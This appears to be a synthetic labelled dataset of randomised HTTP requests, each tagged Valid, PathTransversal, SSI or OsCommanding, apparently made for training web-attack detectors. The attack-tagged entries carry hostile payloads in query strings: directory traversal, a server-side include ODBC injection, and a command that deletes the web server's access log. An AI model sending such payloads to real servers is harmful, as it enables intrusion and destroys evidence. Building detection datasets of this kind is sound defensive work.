GET /lfedoon2GMobDl/csn1pdttpjmom.png?ouynaonecaN1E=tcfeeerssTOtEl&ciestnel5=rzQ7ZQu&daUW=464588&NQ6P6GevalI=8&773gYQ59=gtseheaX&BRJTJ@QacQfphp=hde&ud1sit2Edsasoe=deKS2&copimyo=414220&Tpwnnsuktj=eKmz&2MweOfmWulAtW=thhTl%2B%7CN%27txml+p+e HTTP/1.0
Host: www.eb7ta.com:4
Connection: close
Accept: video/*;q=0.5
Accept-Charset: gb2312;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=079
Client-ip: 93.228.88.97
Cookie: lujlr= %i;blt0saezartsN=eLF;nobnsbltsfa8e=:;hart=edir;olfiw=ferznrlinkuntusrtae;nniviheeeek1=OtaulrI
Cookie2: $Version="358"
Date: Sat, 14 May 05 04:40:51 GMT
ETag: "R.jMxP8GeCxAaao"
Expect: snhsa=sroukt;UaSeee
From: l14gyjst@isddra.be
If-Modified-Since: Wed, 24 Oct 07 20:27:19 GMT
If-Unmodified-Since: Thu, 12 Apr 07 15:19:14 CET
If-Match: *
If-None-Match: "AR8HrXk7BWzbKtZY"
If-Range: Mon, 01 May 06 05:49:02 CET
Max-Forwards: 2824
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: NTLM YnNud0VjbVNuUmNodzE4Y2kwb2N0MWJjcGh0ZHJ3dG95dQ==
Range: -955518,84-,42-
Referer: /lsrnee/gensl/nsbts/1tAdhEe/d1ao.php4
TE: trailers,deflate;q=0.2,chunked;q=0.9
Trailer: If-Range
User-Agent: Mozilla/3.4 (compatible; MSIE 1.5; Linux i586; dlzr2sta; hwetrbm)
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 116x6523
Via: 6.5 www.ebgr.tiff, 4.2 246.238.253.108
Transfer-Encoding: compress
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18965
Start - Id: 18552
class: Valid
GET /oitbse/6tMnJL-0doK/a.zZTCYNL/0tettha/locationccPwJ/evalc6/llCj/hhe1rthneScevfezo/ladhogiy/eprKE@ro7.tKyOlpl/bxliaeb/mu.jpeg?5hnonean9eas=hrWyal&4MMJszIEabr=iuso&CQeHo8XV1x9j=j+idnaccess_logOH3r&ticsniranoap8Sh=2jwUlvP%40UA%40&h5h5wN6=sCpQyGKYMDR&2LnullJ0M32=c&tdy8scnHnOI=arytierwco7reyf&elrla0eo7ehmlao=79154&ld7xLcbfioe=e%26m%5C%3Eeoaaes&U_J5xaUdv-=amtnhyrE1a0hOr&sr0=002 HTTP/1.0
Host: 79.227.88.15:1521
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, compress, compress;q=0.4
Accept-Language: a-ecqi, rhasT-sEhl, as-te, d9raa29-asty, Lc33i-St
Cache-Control: only-if-cached
Client-ip: 90.202.52.93
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="26"
Date: Thu, 30 Mar 06 19:19:02 GMT
ETag: "-IEAX4ET84Q1pJCd"
Expect: pEbr=m5Fy;tsoAplxR=eieeotia
From: 2dHy@nMyaaotcd.gov
If-Modified-Since: Tue, 25 Jan 05 15:08:15 GMT
If-Unmodified-Since: Thu, 11 May 06 09:08:31 GMT
If-Match: "turH_UA1._xoLydi"
If-None-Match: "6azVtGi-@0uKRW5B"
If-Range: *
Max-Forwards: 5440
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic ZTByZTpzYVR1aWk=
Authorization: Digest realm
Range: 46-,56-
Referer: /hwnih/dbyYe/esAr.mdb
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.1 (Windows; U; Win98 7.5; Ng-rc; rv:7.1.7) Gecko/17796341
UA-CPU: Sparc
UA-Disp: 973,9699,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5538x3966
Via: 5.9 www.tqjms.tiff, FTP/4.1 88.31.241.47
Transfer-Encoding: 4e1i; eawzey=snsq
Upgrade: eeyva/6.8
Warning: 513 176.80.122.103 "ratxspswAeSs" "Sat, 28 May 05 09:22:11 GMT"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 6081025334280636009
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18552
Start - Id: 27779
class: Valid
GET /Feval2DF/jwJx4xGFqyLH/iMmgnZVDaq/dN8/nBmauitnnFiolagsee/esmer3/uohtibl2eleNhFo3zT.jpeg?esdAerrme=+ifsselecter&aI=usrai%28 HTTP/1.1
Host: 93.162.125.132
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity;q=0.6, deflate;q=0.7
Accept-Language: cngrSrln-hsTsl;q=0.3, b7utyai-es, yuiekbn-a;q=0.3, Er-rcn, tfl-erd;q=0.8
Cache-Control: min-fresh=56
Client-ip: 138.75.107.168
Cookie: titeg4ind=u5;Geraaceenkn7ge=tuztjis;zQEr=sexec~aeaccess_log;alssl=dmhtacces urs
Cookie2: $Version="161"
Date: Fri, 10 Dec 04 24:15:49 CET
ETag: "asqnX8rt1Izz8FLv-"
Expect: pntedb4t
From: omsc@oihc6.biz
If-Modified-Since: Mon, 29 Nov 04 16:01:00 GMT
If-Unmodified-Since: Tue, 24 Jan 06 10:31:53 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM OW1sc2hlZWo3ZTN5YnNvZWFpbmZ3cm1ydHJ1b3dhbmVvM2ViYW1BaHM=
Authorization: NTLM ZWFwdEh5N2lkbE80MXduZGNzZ3RuMnRpaW5lM2l3ZWVnb2tpZ0RjYmE=
Range: 36097-56,7-
Referer: /2aie9/ne7bp/2Mtbp/anamihre/watoiig.jsp
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/5.9 (compatible; Konqueror/2.7; Solaris; rnodre)
UA-CPU: x86
UA-Disp: 837,4727,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 483x5740
Via: 4.7 84.179.176.136, agf/5.5 www.ieshookt.html, 2daj2/6.5 77.186.16.186
Transfer-Encoding: compress
Upgrade: sDOr/8.7, ola/6.0, voie/0.2, 3romlw/9.3, Zm9o/0.9
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 213.115.160.45
X-Serial-Number: 00771445760189664084
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27779
Start - Id: 44839
class: PathTransversal
GET /oeentri21ad0Nieewiii/tEt1citheHis/p9F56@QQPJc/tattsea/oLEt50cinol/sahdXtH3CTpezrqOZ.php?qsmdtDlmehAnen=..%2F..%2F..%2Fon%2Fadmin.txt&RvoZ=gohconnectquooa&8jwadg=THgryloii%2Ft7lgC&fa1aepwhrno=ml+t1r6oo HTTP/1.1
Host: 104.219.202.135
Connection: xzas
Accept: */*
Accept-Charset: windows-1255, windows-1257;q=0.1, windows-1258;q=0.5, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=585
Client-ip: 55.4.250.85
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="393"
Date: Sun, 27 Mar 05 03:36:51 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Thu, 02 Jul 09 03:16:16 GMT
If-Unmodified-Since: Fri, 09 Feb 07 13:02:29 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "wR_cMKeEkXkLCXj@0bjj"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 912
MIME-Version: 3.1
Pragma: iittln0n='i'
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: NTLM aGxlZWVyaGFxbzNwaWFtM0Vsc3RscmVtb1N4a29zYWly
Range: 4-,8-56742
Referer: /aeuele/o6crrtt/9ratbr/vogeqhmn/tS8roa.php4
TE: chunked,trailers,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/8.1 (X11; U; Linux i386 2.8; lh-ai; rv:8.7.0) Gecko/24423121
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 2.5 127.214.120.94
Transfer-Encoding: identity
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44839
Start - Id: 1752
class: Valid
GET /rt/oLu3Pwp-uD/tnuveieA1td/edieodJsnaayvtsgh/glTbQ/oqT@G./lou9a/omUq/9trIedf4eietqiIed.png?hlgEof6Rlfa5=v&teDolteuhsCee=mM34-%408x&ntenEbo0=a4aouwhcc0uhjo&cmsbwaHwoy8=8537772&YQr@RCc8tJ=4eRE46tsso&ddiR3nnr6x=scs2t&tD5ierircd=019034&XOnodeevalnechoLWe=aiooonbh&qra=ianxw3yovku&divViV-var=1&8easwod=tsnenolnif3nst&eawnpeaEea=wD5ie.Ce7eNj&Sra1baoa4htAV=10088713 HTTP/1.1
Host: 6.81.36.189:13955
Connection: close
Accept-Charset: hz-gb-2312;q=0.8, windows-1252;q=0.7, euc-cn;q=0.3, cp-936, windows-1251
Accept-Encoding: gzip, identity;q=0.2, gzip
Accept-Language: oed6esb-ste1tni, fcUwu5-a, E-er, qokl-met;q=0.1
Cache-Control: only-if-cached
Cookie: 9ooincgft2muEl9=fuLiGhyste
Cookie2: $Version="156"
ETag: W/"1rGlZI2_N_SUdCE-Yj8"
From: n9mf@hcs9solg.ch
If-Range: *
Max-Forwards: 17
Proxy-Authorization: tyho a4sceAie=eeAlad
Referer: /ntoogD/rehis.jpg
User-Agent: Mozilla/5.5 (Windows; U; WinNT 3.1; g2-o5; rv:7.7.6) Gecko/92694168

null

End - Id: 1752
Start - Id: 1047
class: Valid
GET /tTAy86/aRS_KGp/eDwX7DWUft/kqa2Pee-qg/hmNgudaeatn/rmkkt7g/ris0QKLesOLoC764A/oY9za/ynHALYX2j6Py1fPJ0mW/ijnn0gmr9ioe1eirl/ivURiIrKI7Ig8hM/irf6enearLVotrlsthoe.mspx?auteyeft=nhsN9jmeaoso&rnullmPKLoRz=ENic%25&tstemla=aiPsyTTB9WT&BdMfr1VIl=m+om+2EntHrQm&E9MiNYUN=00fstrstdiFej&a3ge=11&ScZ8CdOexec--=D%2Bna&romurctimmsaeo=bonueuwq%7Esall&ptfc=ie+a%7Ephsaay&x5r6tsiiicee=s%29a0atlrandaeba&iead=iawm0tt&fa4=lt9iaslSwo HTTP/1.0
Host: 49.57.57.78
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 249.62.66.135
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="761"
Date: Sat, 01 May 10 10:37:31 GMT
ETag: "3gnTJCEQdXBWhxkQD.h2"
Expect: omon5e
From: lSpom@es6vknOma.biz
If-Modified-Since: Tue, 15 Nov 05 07:25:52 GMT
If-Unmodified-Since: Thu, 15 Jan 04 09:20:04 CET
If-Match: "6TcN.9FZ6zpNWZbl@Kp"
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM YWRpbmxnaGg2bGlzZXBSaTRtS3JDZ2w4Z3J6d2FyM2k2YnJn
Authorization: uria ea9e=aOablu
Range: 86150-
Referer: http://www.hhvosol.fr/eede1pH/cXdah/eneAh.php4
TE: deflate
Trailer: If-Modified-Since
User-Agent: rhoexO (aUUcKn)
UA-CPU: MIPS
UA-Disp: 235,5238,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8806x127
Via: 5.0 www.Akeht.htm, 3.9 www.nniso0a.tiff
Transfer-Encoding: mhfsSt; ahszD=aL1lt
Upgrade: ihTafo/2.0, nep/7.8, Uyc4a/9.8, srh/6.2
Warning: 412 1.70.23.21 "qmhue6nreaztecan" "Fri, 29 Oct 04 18:45:48 UTC"
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 1047
Start - Id: 40843
class: SSI
GET /ewCf_.4GVN/sePdBCtVBKL/yltisEriOnhi/HwtEcTtpgcPnaStrts/otlihKatis/sor/sHFI4y-Ae5UbsBaULN_o/nsnliredeuDpmRitJa.tiff?icP=niopmqrg5tzOqW2&w0isrh=5adueKxeodnitgdt&fYaor7hvnaai=ecsusmihgoeti+c&3Qp3E@=4teuzaEofmt&aOrCssbnsnzi=35210&mi=en&2plpjelebrqems=KIrt&ettdRWvlknhtalt=rle&htotiieecuauqdi=uPN6zm67PYz2&etf8H=%3C%21--+++%23odbc++statement++++%3D++++%22select++N4rm0dlq%2C+++ihaAsvoe%2C+++++55rglem+++++from+++++sNeAhfotdr++++order+by+++2%2C+++740%2C++++0%22+--%3E&hynH=7745783&nCsomet=meaaYlesce4ebtrsd HTTP/1.0
Host: 238.33.236.142
Connection: keep-alive
Accept: image/png;q=0.0, image/jpeg
Accept-Charset: *
Accept-Encoding: compress, gzip, identity
Accept-Language: *
Cache-Control: yR7es=tti2lc
Client-ip: 75.99.25.245
Cookie: bNtm=79;oo=30508
Cookie2: $Version="28"
Date: Mon, 29 Sep 08 10:48:31 UTC
ETag: "c4DJWXpb1.Q0Ita"
Expect: un3h
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Sun, 26 Nov 06 09:51:31 CET
If-Unmodified-Since: Tue, 12 Jun 07 16:27:34 UTC
If-Match: "-2O5unBah_NEerbOlsvX"
If-None-Match: *
If-Range: Fri, 07 Apr 06 23:24:03 CET
Max-Forwards: 7134
MIME-Version: 1.5
Pragma: stseT='3V'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: http://www.ekbrc3u.ch/ofce/toeIyg/5dll/ts9ti.avi
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: lsklps (dsREJmGr9; lJBxzmao; hkFaaJV_; ejxFymS_2)
UA-CPU: PowerPC
UA-Disp: 7505,615,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: 9.1 www.syeee4.htm, HTTP/5.5 21.211.108.139, Aeo5on/8.3 213.101.214.233
Transfer-Encoding: deflate
Upgrade: smTMae/0.2
Warning: 883 62.123.51.153 "ctiihnf6soVui" "Wed, 19 Jan 05 12:07:07 CET"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 938964588863184564
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40843
Start - Id: 18313
class: Valid
GET /Vj6oexecx0Da/rxhqkzlx2@-d0pxev/h_GziogSL/staVMGpGI/3lRnph-SQ/NY0/ep8Q_f03m/0A.shtml?eV74ncG_36netcat=qsh+&0jitsmotlozzg=f1tb HTTP/1.0
Host: 207.54.29.87
Connection: ehooei0r
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.1
Cache-Control: max-age=80170
Client-ip: 215.36.116.35
Cookie: frmecxi=passthruoa;0air8oa5oc=Oh>;apeeslYlwrinn=prNtuob9s;2e43=hqe  ;gNsvnd1eshfnnh=ine -@aa
Cookie2: $Version="4"
Date: Sat, 12 May 07 02:16:24 UTC
ETag: "uhksSzdVKdXbiQ9ZQ"
Expect: rvsav2=sltuna;ndynn
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Thu, 30 Oct 08 03:06:45 CET
If-Unmodified-Since: Fri, 28 Aug 09 18:56:56 CET
If-Match: *
If-None-Match: "q.ktx@kHQ6D.ntY5hZ8s"
If-Range: Tue, 10 Feb 04 08:36:09 UTC
Max-Forwards: 85
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: NTLM aWppaXR3ZGllUkVhc3RzZmZJZmgyb3N0aWFhZ2NlRXJlMXBlZGo=
Range: 33-392,-2077,7-8592
Referer: /aloxm.msf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/5.9 (Windows; U; Windows NT 4.2; eS-ef; rv:2.2.1) Gecko/01397538
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: FTP/0.6 www.aittem.htm:3, 6.0 www.nesuen.jpg, 8.7 183.58.132.62
Transfer-Encoding: identity
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18313
Start - Id: 27398
class: Valid
GET /9rgunkh/3ahe7c/gbyyPLJGJALJALJ/lMDxh4w@bq0cXnA/rypcOroiDhiitarhs/anaAocgi/ihfayon/uZp0pHMX8.H6fL5ANlQr/hoauTeerxdo/waQP1Wt1b52.gif?sock_streamrmd3TLc9Rhq=57250126&poo5yiasap=3&sfctencn7eTmma=r+&neridb7=218924789&nAjJalog5=ti0sar&-7bNc_MUY=shrp6%25ox&aWdScqi=961774&W.rDQk-BlD=iacBe&0tem=821764&ntkh=onac5xmlroo6ee8e&ednk=eepsheiesqeoixml&Hf4jVEN=nmEeemgo&rara6yAlu1Rnk=59159328&aDa=sXQX7LSpKT HTTP/1.1
Host: www.fpelynnoeo.st:350
Connection: esea2i
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, identity, compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 145.73.80.153
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="89"
Date: Fri, 16 Jan 09 07:31:00 CET
ETag: W/"vB7E3Anf@TEEZMA3D.UI"
Expect: d2al0
From: glqntj@hA8egh.fr
If-Modified-Since: Fri, 21 Dec 07 22:27:45 GMT
If-Unmodified-Since: Thu, 27 Nov 08 11:53:57 UTC
If-Match: "b2rzMfpF9WPNjKN5"
If-None-Match: *
If-Range: *
Max-Forwards: 43
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: NTLM bzNkc2Zlc2UwZE1ubndkYkJvd3VKdHJyYWFvM083R2VyaTB0ZTd0Yw==
Range: 13-62
Referer: http://www.9njd9lsy.be/neeho/thdEsNu.php4
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 8.7; rr-mi; rv:2.3.7) Gecko/03894834
UA-CPU: 68000
UA-Disp: 009,2103,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9698x542
Via: FTP/1.4 68.205.130.1, FTP/1.1 www.l2pacru.js
Transfer-Encoding: deflate
Upgrade: Ut0et/2.4, riu/2.5, oFvi/8.5
Warning: 680 www.tdeh77g.gif "z1eLBiT0" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 012150343166763006
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27398
Start - Id: 17350
class: Valid
GET /mtir/i3asfaovrneiA.jsp?ner=1418&4_Hx1Uv=1435483546&jiM1V.F_=38thojeeonha&yEQXI@execHJ=hnn&sr=hQhaln&fox9lG7th=zn%5Chttpss%2Bd HTTP/1.1
Host: 137.178.139.243
Connection: 5naei
Accept: image/png, video/mpeg, image/gif;q=0.8
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.5, identity, identity;q=0.4
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 72.237.2.23
Cookie: 7or3avake=pneiXh;soi2dusirNuea6a=ho
Cookie2: $Version="64"
Date: Wed, 15 Mar 06 23:30:42 GMT
ETag: "OntaRxc2nvK3PjYB"
Expect: 100-continue
From: atnl@pt6tqur.gov
If-Modified-Since: Tue, 29 Aug 06 19:46:43 CET
If-Unmodified-Since: Fri, 03 Feb 06 04:08:59 GMT
If-Match: "5.dLEkGeqRlGePGOiKv"
If-None-Match: "zLSTWaJeHzhNQ0YX"
If-Range: Sun, 27 Sep 09 23:12:03 UTC
Max-Forwards: 865
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM b3RlaG5uc2hrZXljY21ub3JvMGVlaGRodG9nNzRtbWloaWg=
Range: -891481,4-
Referer: http://www.4clve.gov/iesesn/aela/emtutidE.php3
TE: deflate,trailers,deflate
Trailer: Range
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 4.2; tt-ab; rv:6.8.7) Gecko/68915387
UA-CPU: 68000
UA-Disp: 469,0060,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 717x8576
Via: HTTP/8.1 163.159.162.36:3, HTTP/9.2 216.41.190.29
Transfer-Encoding: deflate
Upgrade: hulh/0.2, aau/8.4, stan/1.1
Warning: 958 91.173.38.76 "jetsanndA" "Wed, 17 Jun 09 11:49:56 GMT"
X-Forwarded-For: 81.255.22.153
X-Serial-Number: 69600
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 17350
Start - Id: 36795
class: OsCommanding
GET /xcanI47/ZMNFk/r3I3Tmc/phpwVSQ/UJgstyleaDvaroU1replacepncD/Imssr4sehhA/sne/C0LD1Elike.html?ttQhnpsysareju=932&okeoeesr2aie=3958832&ttr=ztbfyie&te=u1BnNH9&edTgqnti8=Egihservicesytc&ea4e=wlt7syo4aNgall&htzi1s=bK2AV1G&Oc=i+&eXerYnxcci=usr%7Cstlsren++Rimf&ssieoetCiN=%250arm+++++-f+%2Fvar%2Flog%2Fhttpd%2Faccess_log%3B&nec=623&tvessiIaeyane=207&vftpXdBL=y4etqr89lnuvobject3&3d=2&ay0uoa8skt=65 HTTP/1.1
Host: 47.233.199.29
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: rcqifa4s='cHed7'
Client-ip: 90.167.86.81
Cookie: Eofsanbzd=0>=h;9D0os=cBoSTui.F-dJ;nre7eqm=connectdo;1nT0AeseioriH=13197813
Cookie2: $Version="08"
Date: Fri, 11 Mar 05 20:46:01 UTC
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Sat, 07 Feb 09 01:31:47 UTC
If-Unmodified-Since: Fri, 07 May 04 15:41:16 GMT
If-Match: *
If-None-Match: "h6uEFxJgOmve@m8qmR"
If-Range: "veBP4ERr77NlUMgYmQ"
Max-Forwards: 62
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: Digest qop=y6Mcma
Range: 31-990997
Referer: /lreOd/reexCt/vdTten.aspx
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: ufLnbmta
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: gzip
Upgrade: wfs/7.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36795
Start - Id: 6054
class: Valid
PUT /34D0LXanvQlN/cp3s/l1hQW@rmm2.jpg? HTTP/1.1
Content-Length: 114
Content-Language: irkn2
Content-Encoding: identity
Content-Location: http://www.fxaagXrm.net/tm0dvc/junyro/uodtjt7/5rto/nridex9u.exe
Content-MD5: b2JvYWhyM3BlTGFyZmxybg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 10:47:59 CET
Last-Modified: Sun, 27 Aug 06 07:01:16 GMT
Host: www.oRHmsi.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=65349
Client-ip: 149.87.24.213
Cookie: inlTnangi=rrmandwla:imeeonr;Onjot2=22489;EiumjeLI=oV74TKWh;uXt= hwhereGM
Cookie2: $Version="45"
Date: Sat, 29 Oct 05 16:55:22 GMT
ETag: "SjEeyX-@H-Z3ImFQTM9p"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Sat, 19 Feb 05 01:24:25 CET
If-Unmodified-Since: Thu, 01 Sep 05 14:22:01 GMT
If-Match: "tjqbUZCpDq6GCkLuGTw8"
If-None-Match: "z3X@qxTl1oaiZxC"
If-Range: *
Max-Forwards: 579
MIME-Version: 3.9
Pragma: itrrs='daD'
Proxy-Authorization: IEaq ghnuWgnb=dheobaz4
Authorization: Basic aXRocjhvYWQ6cnNzd2g=
Range: -49420,-860
Referer: http://aastn.be/rlna/akrhih/sxbeeae/jgwo.tar.gz
TE: trailers,chunked;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.4 (X11; U; Unix 7.8; Ci-oe; rv:2.9.7) Gecko/30055342
UA-CPU: x86
UA-Disp: 7915,1148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 311x5128
Via: 0.9 121.110.237.40
Transfer-Encoding: identity
Upgrade: has5y/4.3, eeohRn/1.7, ahe/4.9, isrias/0.3, tsayOs/5.2
Warning: 878 60.67.82.100 "uTte" "Tue, 19 Oct 04 04:40:48 CET"
X-Forwarded-For: 162.114.213.90
X-Serial-Number: 74978987947334907792
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Rtpj0ce4t3pt=1&ieyaioElImedghu=oBbtoiyd&maeTybulsi=hsystemform0fyeMes&rcica=3E_7N59GR&sMdo=2206&nQenfziv0o=iT78t2j

End - Id: 6054
Start - Id: 16644
class: Valid
GET /ltieee7Hear/rtngqerwstQ.html?ErA4ehfdl=42163&19xat=3VJLJY4&rtcp556eemhde7=rvideCm&cgroup byJlhhCq=14&nahntaYiisly=tmp7oyidteet%3Ea%2B+er HTTP/1.1
Host: www.9Nbd31t.it
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.7, gzip, compress, identity
Accept-Language: ath-iuaj;q=0.0, qabacu0-oro0
Cache-Control: max-age=40
Client-ip: 185.9.41.179
Cookie: lo0Ntahtra=umdoaya;Fosperlu3wmE=isock_streamlo;fdtloeiGll=lfhwd;e5yvTne4Ces=ab;7M4Sib=917719;li3=51053
Cookie2: $Version="281"
Date: Tue, 29 Aug 06 01:29:29 CET
ETag: "3bnoz3i9aeBD2wCyPlS"
Expect: 8rOrt
From: 7beimH@indn.it
If-Modified-Since: Mon, 15 Aug 05 16:41:02 GMT
If-Unmodified-Since: Wed, 03 Jan 07 20:13:56 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Jan 06 01:44:51 GMT
Max-Forwards: 8
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest uri=/et7i.jpg
Authorization: NTLM b2tldXhlZWNpU2VvN2VkdG9zdWV5dW1tZXFoRW9lcmVlbnVhaHllYUQweA==
Range: 093-,-09255,0926-309
Referer: /d3cmdmil/stefc/t5ondu/r8saiynt.js
TE: deflate
Trailer: Warning
User-Agent: a6naUqinvs (hwG5qLF9M; qI@E2Cx-; 0K2Cd2nH)
UA-CPU: x86
UA-Disp: 950,9201,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5729x0287
Via: 4.1 12.23.28.142:134
Transfer-Encoding: identity
Upgrade: n3amhi/4.3, hx6It8/3.4, tcc1Ue/2.8
Warning: 776 12.83.110.221:697 "intttghuuaPl" "Tue, 01 Mar 05 05:24:24 UTC"
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6793102
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16644
Start - Id: 21536
class: Valid
GET /ozmm.Uqb7eIp8kPCk@/sCjsx0aATbYd.aspx?ijn5riktanraoI=ezko+updatexaseoE5&aeSe=taocN79dehiosfoho&zitsyeee0=mdEcopyx&3deleteVMGyO.=sg%27e&PamacIgnwh=87247096&hdoym2v9Aeo=7277&wlt=90161&kHaeysqnla=abz+&ttenelle=0&hY=t1Bm&ereerewm7=88979364&srotgodmsbrzso=0zwuIZx HTTP/1.0
Host: www.iiul3ii.biz
Connection: keep-alive
Accept: application/x-tar;q=0.1, audio/*;q=0.7
